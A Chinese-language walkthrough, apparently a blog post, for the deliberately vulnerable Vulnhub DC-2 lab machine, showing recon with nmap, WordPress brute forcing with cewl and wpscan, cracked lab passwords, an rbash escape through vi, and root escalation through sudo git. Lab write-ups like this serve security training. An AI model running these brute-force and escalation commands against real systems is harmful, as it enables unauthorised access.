手把手教通关Vulnhub靶场-DC2靶机
一.靶机下载
官方链接: https://download.vulnhub.com/dc/DC-2.zip
网盘链接:https://pan.baidu.com/s/1zirpZ00DbhwKlfbMrmq-fQ 提取码: i3cc

导入之后要在设置中将其调为NAT模式

默认情况我们是不知道靶机的密码的,目的是通过kali获取靶机中的flag信息
二.靶机信息收集
因为靶机与kali处于同一网络状态下,使用命令:arpscan -l 得到靶机的ip为:192.168.194.132
使用命令:nmap -A -p- 192.168.194.132 对靶机进行扫描

发现开放了80,7744端口,尝试进行访问,输入ip发现被解析为dc-2,我们想到dc-2这个域名解析失败,我们更改hosts文件,添加一个ip域名指向

使用命令:sudo nano /etc/hosts
将192.168.194.132 dc-2 添加进去
再次进行访问

下滑点击flag发现flag1

三.暴力破解登录框
根据flag1提示使用cewl爬取一下密码本
使用命令:cewl http://dc-2 > passwd.txt
cat passwd.txt
cat passwd.txt
获取密码本之后我们要寻找登录框进行登录,所以我们要扫描他的目录
使用命令:dirb http://dc-2
扫描发现后台,进行访问
一眼发现这是WordPress,我们采用专门针对wordpress的工具wpscan来进行用户枚举
使用命令:wpscan --url http://dc-2/ -e u
使用命令:echo -e "admin\ntom\njerry" > username.txt

使用命令:wpscan --url http://dc-2/ -U username.txt -P passwd.txt
成功爆破出账号密码:jerry/adipiscing tom/parturient 登录进去后发现了flag2


四.暴力破解ssh
根据上面的信息收集我们还知道了ssh开放端口被换成了7744,我们尝试进行登录
使用命令:ssh tom@192.168.194.132 -p 7744 输入密码parturient

发现flag3.txt,但是无法使用cat查看,使用其他查看的命令

经过一段时间的尝试发现命令:vi flag3.txt 成功查看flag中的内容

五.vi提权
根据flag4的线索,我们现在应该转向jerry,su命令提示了提权
因为能使用vi命令,所以直接使用vi进行提权
使用命令(下面两条命令是写在vi底部的):
vi
:set shell=/bin/bash
:shell




六.git提权
想要使用su提权到jerry但是发现没办法使用

使用命令:BASH_CMDS[su]=/bin/sh;su
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
su jerry

使用命令:sudo-l 查看权限
使用命令:sudo git -p help config
!/bin/bash

成功提权,切换到root

成功获取最后的flag!
如有错误请大佬们指正!
到这里我们也是成功通关了DC2靶机,后续会接着更新DC系列的靶机通关教程,请多多关注一下!
AtomGit 是由开放原子开源基金会联合 CSDN 等生态伙伴共同推出的新一代开源与人工智能协作平台。平台坚持“开放、中立、公益”的理念,把代码托管、模型共享、数据集托管、智能体开发体验和算力服务整合在一起,为开发者提供从开发、训练到部署的一站式体验。
更多推荐



所有评论(0)